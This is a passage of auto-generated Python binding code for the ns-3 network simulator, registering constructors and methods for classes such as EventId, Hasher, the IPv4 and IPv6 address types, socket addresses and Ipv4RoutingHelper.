cls.add_binary_comparison_operator('==')
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventId const &', 'arg0')])
## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
cls.add_constructor([])
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
cls.add_method('GetTs',
'uint64_t',
[],
is_const=True)
## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
cls.add_method('PeekEventImpl',
'ns3::EventImpl *',
[],
is_const=True)
return
def register_Ns3Hasher_methods(root_module, cls):
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hasher const &', 'arg0')])
## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor]
cls.add_constructor([])
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('std::string const', 's')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('std::string const', 's')])
## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function]
cls.add_method('clear',
'ns3::Hasher &',
[])
return
def register_Ns3Inet6SocketAddress_methods(root_module, cls):
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Inet6SocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Inet6SocketAddress const &', 'arg0')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6, uint16_t port) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'ipv6'), param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'ipv6')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(uint16_t port) [constructor]
cls.add_constructor([param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6, uint16_t port) [constructor]
cls.add_constructor([param('char const *', 'ipv6'), param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6) [constructor]
cls.add_constructor([param('char const *', 'ipv6')])
## inet6-socket-address.h (module 'network'): static ns3::Inet6SocketAddress ns3::Inet6SocketAddress::ConvertFrom(ns3::Address const & addr) [member function]
cls.add_method('ConvertFrom',
'ns3::Inet6SocketAddress',
[param('ns3::Address const &', 'addr')],
is_static=True)
## inet6-socket-address.h (module 'network'): ns3::Ipv6Address ns3::Inet6SocketAddress::GetIpv6() const [member function]
cls.add_method('GetIpv6',
'ns3::Ipv6Address',
[],
is_const=True)
## inet6-socket-address.h (module 'network'): uint16_t ns3::Inet6SocketAddress::GetPort() const [member function]
cls.add_method('GetPort',
'uint16_t',
[],
is_const=True)
## inet6-socket-address.h (module 'network'): static bool ns3::Inet6SocketAddress::IsMatchingType(ns3::Address const & addr) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'addr')],
is_static=True)
## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetIpv6(ns3::Ipv6Address ipv6) [member function]
cls.add_method('SetIpv6',
'void',
[param('ns3::Ipv6Address', 'ipv6')])
## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetPort(uint16_t port) [member function]
cls.add_method('SetPort',
'void',
[param('uint16_t', 'port')])
return
def register_Ns3InetSocketAddress_methods(root_module, cls):
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::InetSocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::InetSocketAddress const &', 'arg0')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4, uint16_t port) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'ipv4'), param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'ipv4')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(uint16_t port) [constructor]
cls.add_constructor([param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4, uint16_t port) [constructor]
cls.add_constructor([param('char const *', 'ipv4'), param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4) [constructor]
cls.add_constructor([param('char const *', 'ipv4')])
## inet-socket-address.h (module 'network'): static ns3::InetSocketAddress ns3::InetSocketAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::InetSocketAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
## inet-socket-address.h (module 'network'): ns3::Ipv4Address ns3::InetSocketAddress::GetIpv4() const [member function]
cls.add_method('GetIpv4',
'ns3::Ipv4Address',
[],
is_const=True)
## inet-socket-address.h (module 'network'): uint16_t ns3::InetSocketAddress::GetPort() const [member function]
cls.add_method('GetPort',
'uint16_t',
[],
is_const=True)
## inet-socket-address.h (module 'network'): static bool ns3::InetSocketAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetIpv4(ns3::Ipv4Address address) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ipv4Address', 'address')])
## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetPort(uint16_t port) [member function]
cls.add_method('SetPort',
'void',
[param('uint16_t', 'port')])
return
def register_Ns3IntToType__0_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType(ns3::IntToType<0> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 0 > const &', 'arg0')])
return
def register_Ns3IntToType__1_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType(ns3::IntToType<1> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 1 > const &', 'arg0')])
return
def register_Ns3IntToType__2_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType(ns3::IntToType<2> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 2 > const &', 'arg0')])
return
def register_Ns3IntToType__3_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType(ns3::IntToType<3> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 3 > const &', 'arg0')])
return
def register_Ns3IntToType__4_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType(ns3::IntToType<4> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 4 > const &', 'arg0')])
return
def register_Ns3IntToType__5_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType(ns3::IntToType<5> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 5 > const &', 'arg0')])
return
def register_Ns3IntToType__6_methods(root_module, cls):
## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType() [constructor]
cls.add_constructor([])
## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType(ns3::IntToType<6> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntToType< 6 > const &', 'arg0')])
return
def register_Ns3Ipv4Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
cls.add_constructor([param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('CombineMask',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv4Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv4Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('GetSubnetDirectedBroadcast',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Address const &', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
cls.add_method('IsLocalMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('IsSubnetDirectedBroadcast',
'bool',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
return
def register_Ns3Ipv4InterfaceAddress_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress() [constructor]
cls.add_constructor([])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4Address local, ns3::Ipv4Mask mask) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'local'), param('ns3::Ipv4Mask', 'mask')])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4InterfaceAddress const & o) [copy constructor]
cls.add_constructor([param('ns3::Ipv4InterfaceAddress const &', 'o')])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetLocal() const [member function]
cls.add_method('GetLocal',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Mask ns3::Ipv4InterfaceAddress::GetMask() const [member function]
cls.add_method('GetMask',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e ns3::Ipv4InterfaceAddress::GetScope() const [member function]
cls.add_method('GetScope',
'ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): bool ns3::Ipv4InterfaceAddress::IsSecondary() const [member function]
cls.add_method('IsSecondary',
'bool',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetBroadcast(ns3::Ipv4Address broadcast) [member function]
cls.add_method('SetBroadcast',
'void',
[param('ns3::Ipv4Address', 'broadcast')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetLocal(ns3::Ipv4Address local) [member function]
cls.add_method('SetLocal',
'void',
[param('ns3::Ipv4Address', 'local')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetMask(ns3::Ipv4Mask mask) [member function]
cls.add_method('SetMask',
'void',
[param('ns3::Ipv4Mask', 'mask')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetPrimary() [member function]
cls.add_method('SetPrimary',
'void',
[])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetScope(ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
cls.add_method('SetScope',
'void',
[param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetSecondary() [member function]
cls.add_method('SetSecondary',
'void',
[])
return
def register_Ns3Ipv4Mask_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
cls.add_constructor([param('uint32_t', 'mask')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
cls.add_constructor([param('char const *', 'mask')])
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
cls.add_method('GetInverse',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint16_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Mask', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'mask')])
return
def register_Ns3Ipv4RoutingHelper_methods(root_module, cls):
## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper() [constructor]
cls.add_constructor([])
## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper(ns3::Ipv4RoutingHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4RoutingHelper const &', 'arg0')])
## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper * ns3::Ipv4RoutingHelper::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ipv4RoutingHelper *',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4-routing-helper.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4RoutingHelper::Create(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableAllAt(ns3::Time printTime, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTableAllAt',
'void',
[param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True)
## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableAllEvery(ns3::Time printInterval, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTableAllEvery',
'void',
[param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True)
## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableAt(ns3::Time printTime, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTableAt',
'void',
[param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True)
## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableEvery(ns3::Time printInterval, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTableEvery',
'void',
[param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_const=True)
return
def register_Ns3Ipv6Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
cls.add_constructor([param('uint8_t *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
cls.add_method('CombinePrefix',
'ns3::Ipv6Address',
[param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv6Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv6Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
cls.add_method('GetAllHostsMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
cls.add_method('GetAllNodesMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
cls.add_method('GetAllRoutersMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function]
cls.add_method('GetIpv4MappedAddress',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
cls.add_method('IsAllHostsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
cls.add_method('IsAllNodesMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
cls.add_method('IsAllRoutersMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
cls.add_method('IsAny',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsDocumentation() const [member function]
cls.add_method('IsDocumentation',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Address const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() [member function]
cls.add_method('IsIpv4MappedAddress',
'bool',
[])
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
cls.add_method('IsLinkLocal',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function]
cls.add_method('IsLinkLocalMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
cls.add_method('IsLocalhost',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
cls.add_method('IsSolicitedMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac16Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac16Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac64Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac64Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac16Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac16Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac64Address mac) [member function]
